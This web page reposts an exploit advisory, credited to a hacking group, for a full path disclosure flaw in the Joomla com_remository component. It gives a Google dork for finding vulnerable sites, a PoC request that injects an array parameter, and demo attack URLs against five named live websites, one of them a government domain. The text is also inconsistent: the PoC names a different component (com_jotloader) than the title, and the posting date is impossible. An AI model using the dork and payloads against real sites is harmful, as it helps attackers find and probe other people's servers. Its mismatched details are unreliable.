Home / os / winxp

Joomla com_remository Component - Full Path Disclosure Vulnerability

Posted on 30 November -0001

<HTML><HEAD><TITLE>Joomla com_remository Component - Full Path Disclosure Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###################### # Exploit Title : Joomla com_remository Component - Full Path Disclosure Vulnerability # Exploit Author : Persian Hack Team # Vendor Homepage : http://remository.com/ # Google Dork : inurl:/index.php?option=com_remository # Category: [ Webapps ] # Tested on: [ Win ] # Version: 3.54.08 # Date: 2016/07/02 ###################### # # PoC: # Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/. # /index.php?option=com_jotloader&section[]= # # Demo : # http://www.joomlanook.com/index.php?option=com_remository&Itemid=53&func=[]select&id=5 # http://www.ierodiakonjustin.info/index.php?option=com_remository&Itemid=107&func=[]addfile # http://iaru-r1.org/index.php?option=com_remository&Itemid=173&func=[]fileinfo&id=410 # http://www.clarioncentral.com/index.php?option=com_remository&Itemid=34&func=[]fileinfo&id=1 # http://www.inec.gob.ec/inec/index.php?option=com_remository&Itemid=420&func=[]select&id=74&lang=ki # ###################### # Discovered by : Mojtaba MobhaM # Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members # Homepage : http://persian-team.ir ###################### </BODY></HTML>

 

TOP